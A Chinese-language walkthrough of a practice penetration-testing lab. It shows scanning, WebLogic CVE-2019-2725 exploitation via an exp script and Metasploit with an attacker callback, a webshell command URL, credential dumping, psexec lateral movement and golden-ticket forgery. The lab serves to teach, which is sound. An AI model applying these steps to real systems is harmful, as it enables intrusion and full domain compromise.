目录
[IP 分布](#IP 分布)
参考文章
vb
`https://www.cnblogs.com/bktown/p/16904232.html
https://blog.csdn.net/m0_75178803/article/details/136114052?utm_medium=distribute.pc_relevant.none-task-blog-2~default~baidujs_baidulandingword~default-0-136114052-blog-123156086.235^v43^pc_blog_bottom_relevance_base7&spm=1001.2101.3001.4242.1&utm_relevant_index=1`
网络拓扑图
1qaz@WSX
环境搭建
解压后找文件内的vmx
后缀文件,会自动打开虚拟机加载,PC
为网关服务器,需要两张网卡,一个用来向外网提供web
服务,一个是通向内网机器,通向外网所以需要再建立一个网卡,保证PC
和kali
同一个网段,靶机Web
和PC
均是双网卡,WEB
登陆时切换用户为: WEB\de1ay
密码: 1qaz@WSX
才能进入,初始无法进入
网卡设置
新增网卡修改子网IP``VMnet2
相当于新增内网网段,提供给靶场使用,在网络适配器加入
10.10.10.0
DC
域控提供单独的10网段就行了,需要出网机器是两个网络适配器,出网 or
不出网,靶机默认开机密码都是1qaz@WSX
需要注意的是,Web
需要切换用户进去登录输入密码才可以
修改Kali网段
靶机WEB``PC
出网网段默认是111
我们可以修改Kali
网卡网段为111
,使其和两台出网靶机网段一直,这是最方便的方式,也可以不修改原始Kali
网段,登录进靶机后在网络适配器修改网段为我们Kali
修改Kali
网段,发现它是VMnet8
自定义,打开虚拟网络编辑器,手动修改此网卡为111
网段
修改成功Kali
网卡网段,打开它然后测试IP
地址并对该网段主机进行扫描看看是否能发现WEB
和 PC
ifconfig
网段扫描是可以成功扫出,说明攻击机Kali
和靶机已经在同一网段下
arp-scan -l
IP 分布
|----------|------------------------------------------|
| | |
| 主机 | IP地址 |
| kali 攻击机 | 192.168.111.128 |
| PC | 外网IP 192.168.111.201 / 内网IP 10.10.10.201 |
| WEB | 外网IP 192.168.111.80 / 内网IP 10.10.10.80 |
| DC 域控 | 内网IP 10.10.10.10 |
Kali
网段扫描出PC
机器,但是没有WEB
(PC
ping不通猜测被拦截或者不出网)
PC
WEB
DC
WEB
渗透
这里我首先使用nmap
扫描该网段主机,但是发现WEB一度
扫描不到,排查一番才发现因为网络适配器设置错误,导致不出网络,修改后即可出网.
PC``WEB
适配器均此设置,NET
自动获取IP
,代表同Kali
同一网段,VMnet2
自定义内网网段10
,但是这里其实Kali
是手动改的,反正只要同一个网段就没事
Weblogin
服务开启
打开WEB
机器,进入C:\Oracle\Middleware\user_projects\domains\base_domain\bin
路径,输入管理员账户密码administrator/1qaz@WSX
右键startWebLogic
执行,代表开启了Weblogin
服务,shell
是在此获取的
Kali
端口扫描
kali
中直接ping
web发现ping
不通,可能是防火墙的问题,但是nmap
扫描需要指定扫描方式为SYN
nmap -sS -sV 192.168.111.80 // -sS 扫描方式SYN -sV服务识别
端口开启可能存在的漏洞,实验直接照WP
了 常见端口漏洞
- 445端口开放意味着存在smb服务,可能存在ms17_010永恒之蓝漏洞。
- 139端口,就存在Samba服务,可能存在爆破/未授权访问/远程命令执行漏洞。
- 1433端口,就存在mssql服务,可能存在爆破/注入/SA弱口令。
- 开放7001端口可能存在Weblogi
访问80
空白
访问7001
报错页面,报错肯定就是要递归的去扫描的,开字典进行扫描,
70001
是中间件weblogin
服务默认端口
漏洞扫描
通过WeblogicScan
扫描和nuclei
均有效果并给出了漏洞地址,直接梭哈,当然还有其他的工具也能扫描出来比如Goby
历史CVE
CVE-2017-10271
CVE-2017-3506
CVE-2019-2725
CVE-1019-2729
漏洞地址
http://192.168.111.80:7001/console/login/LoginForm.jsp
CVE
工具利用
知道了存在反序列化漏洞,在网上寻找相关exp
工具梭哈得到了命令执行地址
pip install logzero
pip install requests
python weblogic-2019-2725.py 10.3.6 http://192.168.111.80:7001
命令执行地址:
http://192.168.111.80:7001/bea_wls_internal/demo.jsp?pwd=admin&cmd=ipconfig
CVE
工具虽然给出了Webshell
地址和密码但是我利用连接工具却连接不上,重新找一个利用工具使用,上传新的马子
MSF
上线
search CVE-2019-2725 // 寻找CVE
use 0 // 使用第一个
set rhost 192.168.111.80 // 出现漏洞的地址
set lhost 192.168.111.128 // kali地址
set target 1 // 设置目标版本为第一个 代表是windows系统
run // 攻击
利用成功得到shell
MSF权限Shell至CS
内网渗透
域内信息收集
查看本机所在域
shell ipconfig /all
所在域: delay.com
扫描IP
发现内网10
网段
shell ipconfig
shell net group "domain controllers" /domain
域控: DC
net group "domain computers" /domain // 查看域中的其他主机名 探测到了PC
域内其他主机: PC
ping
域控DC
和成员主机PC
收集IP
地址
PC
不同但是还是得出了地址,包括DC,在列表中可以看到目标
域控制器 : DC.de1ay.com
PC域名 : pc.de1ay.com
凭证横向移动
CS
抓取WEB
凭证明文和hash
,利用此凭证横向移动攻击域控
扫描发现域控存在445
端口开启,故而创建SMB
监听器,利用凭证配合psexec
由于weblogic启动需要域管理员密码,而本台webserver2008存在内存明文密码的漏洞 故而可知域管理员账密 administrator/1qaz@WSX
创建SMB监听器横向
拿下域控权限,另一台机器也同理,利用凭证横向过去,这里不错演示
权限维持
黄金票据
DC
域控凭证提权抓取hash
值得到域控下其他用户的账户密码,关键的用户是krbtgt
的hash
值,krbtgt
用户是域中用来管理发放票据的用户,拥有了该用户的权限,就可以伪造系统中的任意用户
82dfc71b72a11ef37d663047bc2088fb //krbtgt hash值
伪造条件
-
目标的用户名及域名
-
域的
SID
值 -
DC
中KRBTGT
用户的NTLM
哈希logonpasswords // 查找域的sid
S-1-5-21-2756371121-2868759905-3853650604
输入自定义的用户名和以知信息,伪造黄金票据
回到WEB
会话面板,远程远程连接dir
域控c
盘成功
白银票据
等级低一点的白银票据,条件也是需要获取sid
和hash
值